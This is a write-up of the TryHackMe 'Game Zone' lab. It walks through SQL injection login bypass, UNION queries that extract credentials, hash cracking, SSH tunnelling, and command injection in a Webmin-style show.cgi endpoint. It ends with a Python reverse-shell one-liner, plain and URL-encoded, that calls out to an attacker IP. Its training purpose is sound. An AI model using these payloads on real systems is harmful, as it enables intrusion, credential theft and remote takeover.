# TryHackMe Game Zone writeup

[Game Zone](https://tryhackme.com/room/gamezone) is the fourth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.

# **Enumeration**

Nmap scan output:

```bash
nmap -sC -sV -o gamezone <ip>

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
```

Only two ports are available: `ssh` and `http`.

Open the browser and check the content on port `80`.

# **Exploitation**

I used `' or 1=1#` to bypass the login form.

After that, you will be redirected to the `/portal.php` page with a single search bar.

The official guide is recommending you use `SQLMap` here, but I’m doing this room to prepare myself for the upcoming `OSCP`.

`SQLMap` is banned on the `OSCP`, plus you can use the `Metasploit` only once. That’s why most of my writeups here are using mostly manual ways to exploit the target.

You can read about the manual way of `SQLi` [here](https://portswigger.net/web-security/sql-injection/union-attacks), but I’ll shrink it down to the key points applicable to this box.

We got some data back if we are trying the syntax of a basic `UNION` injection:

```bash
' UNION SELECT 1,2,3#
```

First, we need to know what’s inside the DB. We can check `INFORMATION_SCHEMA` for that:

```bash
' UNION SELECT 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3#
```

As an output, we got the list of schemas. `information_schema,db,mysql,performance_schema,sys`

We are interested in `db` in the first place.

Let’s check what tables can we find inside a `db`:

```bash
' UNION SELECT 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'db'),3#
```

There are only two tables `post` and `users`. `Users` sound more like juicy stuff, let’s dig in a bit more and extract a column of it:

```bash
' UNION SELECT 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'),3#
```

The output: `username,pwd,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS` Sweet, so there are `username` and `pwd`! Let’s extract them:

```bash
' UNION SELECT 1,(select username from db.users),3#

agent47
```

and

```bash
' UNION SELECT 1,(select pwd from db.users),3#

ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
```

We got credentials! Well, it’s still a hash, and we have to crack it.

[`JohnTheReaper`](https://github.com/openwall/john) can help with that.

```bash
/usr/sbin/john -w=/usr/share/wordlists/rockyou.txt ./john.hash --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 AVX 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
***********    (agent47)
1g 0:00:00:00 DONE (2020-10-16 04:10) 2.325g/s 6782Kp/s 6782Kc/s 6782KC/s vimivi..veluca
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed
```

The password is redacted due to THM’s rule about writeups.

Now, when you have both username and password, you can connect to the machine via `ssh`.

---

# **PrivEsc**

Privilege escalation is very tricky here.

First, you can check what is running on the machine. This part is nicely described in the official guide, so I will quickly go through it:

```bash
agent47@gamezone:~$ ss -tulpn
```

We can see that a service running on port 10000 is blocked via a firewall rule from the outside, so we can’t interact with it directly.

However, we can use `ssh tunneling` to forward this service to some ports in our `Kali Linux` machine:

```bash
ssh -L 10000:localhost:10000 agent47@<ip>
```

Now if you navigate to the [`localhost:10000`](http://localhost:10000) on your `Kali Linux` you will find something new there - the login page for admin section of this site.

Plus, you already have the credentials! *wink*

From here, we can find out the name and the version of the CMS.

The thing is, that if you check available exploits for this CMS, you will actually find a few, but both of them are `Metasploit` modules.

Again, my initial goal here is to avoid automated tools.

Frankly speaking, this one took me a while to figure out.

As you might guess, we will not ‘use’ the [exploit](https://www.exploit-db.com/exploits/21851) itself, but I will use the vulnerability described there.

This is a snippet of the most interesting part of it:

```bash
res = send_request_cgi(
   {
    'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
    'cookie'  => "sid=#{session}"
   }, 25)
```

Long story short, we can specify the put a random text there, add the `|` symbol, and put our payload there with another `|` at the end.

If your goal is the flag, you can do something like

```bash
http://localhost:10000/file/show.cgi/show.cgi/bin/AAAA|cat%20/root/root.txt|
```

And get your flag.

But! Our goals here might be different, but I prefer to look at this as a penetration test, and not a CTF even.

> *SHELL &gt; flag*

Let’s spawn a shell, then!

You have access to the system, so you can save some time with commands like `which python`, `which perl`, etc. You can also check if the flavor of the `nc` supports `-e` flag or not.

To get the shell, I used a command from [PentestMonkey](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) for `python`

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

as you will throw it into the browser, don’t forget to `URL-encode` all the things:

```bash
python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.11.19.53%22%2C1337%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27
```

Open up a listener for your port, you can use something fancy as `1337` if you want to trigger your `root` shell:

```bash
localhost:10000/file/show.cgi/show.cgi/bin/AAAA|python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.11.19.53%22%2C1337%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27|
```

Voilà! There you go.

---

# **Takeaway**

* I hate `SQLi` too, but you have to learn it to not always blindly rely on your tools
    
* `Metasploit` is fine, it is well-tested, it is rich, etc. But make sure that you can read and understand the code behind the exploit that you are using.
    
* SHELLS &gt; FLAGS! PERIOD!
